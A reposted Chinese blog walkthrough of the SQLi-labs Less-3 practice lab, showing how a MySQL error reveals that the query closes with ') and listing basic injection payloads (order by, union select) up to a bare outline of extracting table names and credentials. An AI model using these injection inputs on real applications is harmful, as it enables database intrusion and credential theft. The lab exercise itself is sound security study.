当前位置: 首页 >数据库 > phpstudy-sqlilabs-less-3

phpstudy-sqlilabs-less-3

数据库

题目:GET - Error based - Single quotes with twist

基于错误的单引号GET型变形注入

 

?id=1 )and 1=2--+

?id=1 "and 1=2--+

?id=1 %and 1=2--+

上面都没反应

 

?id=1 'and 1=2--+

跳出 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '') LIMIT 0,1' at line 1

提示我们语法错误,说明可注入

再看 near ") LIMIT 0,1 ' at line 1

说明可用 ') 来闭合

 

输入

?id=1 ')and 1=2--+

?id=1 ')and 1=1--+

注入成功

 

 

 

 

查字段

?id=1 order by 3--+

查可显示字段

?id=-1 union select 1,2,3--+

查数据库名与版本

查表名

查列名

查账密

 

作者:我用歌声寻觅你
来源链接:https://www.cnblogs.com/xty123456/p/17376123.html

版权声明:
1、JavaClub(https://www.javaclub.cn)以学习交流为目的,由作者投稿、网友推荐和小编整理收藏优秀的IT技术及相关内容,包括但不限于文字、图片、音频、视频、软件、程序等,其均来自互联网,本站不享有版权,版权归原作者所有。

2、本站提供的内容仅用于个人学习、研究或欣赏,以及其他非商业性或非盈利性用途,但同时应遵守著作权法及其他相关法律的规定,不得侵犯相关权利人及本网站的合法权利。
3、本网站内容原作者如不愿意在本网站刊登内容,请及时通知本站(javaclubcn@163.com),我们将第一时间核实后及时予以删除。





本文链接:https://www.javaclub.cn/database/118390.html

标签:SQL_syntax
分享给朋友:

“phpstudy-sqlilabs-less-3” 的相关文章

MySQL触发器 2022年05月16日 21:53:36
数据库设计之从0到1 教你如何设计E 2022年05月17日 16:06:44
JDBC连接时所犯错误1.字符集设置不合适2.连接MySQL8.0社区版时时区不一致3..包名不能以Java.命名4.驱动被弃用 2022年05月20日 04:13:31
Linux (centos8)安装 MySQL 8 数据库(图文详细教程) 2022年05月25日 23:55:16
性能优化|深入理解mysql索引数据结构与算法 2022年05月26日 23:11:14
mysql|mysql删除重复数据,一条sql就搞定 2022年05月26日 23:28:20
mysql 查询数据库内存大小 2022年06月06日 11:11:26
mysql查询最新的一条记录 2022年06月06日 16:04:12
会mysql不一定会sql 2022年06月07日 04:41:06
mysql查询字段为null 返回0 2022年06月10日 20:48:10

关于本站   |  免责申明   |  意见反馈   |  网站历程   |  友情链接   |  标签大全
京ICP备2022013903号

Powered By JavaClub. Theme by TOYEAN.

 
QQ在线咨询
关注公众号
java全栈架构师
回复【加群】
加入微信交流群
微信扫一扫
加入微信交流群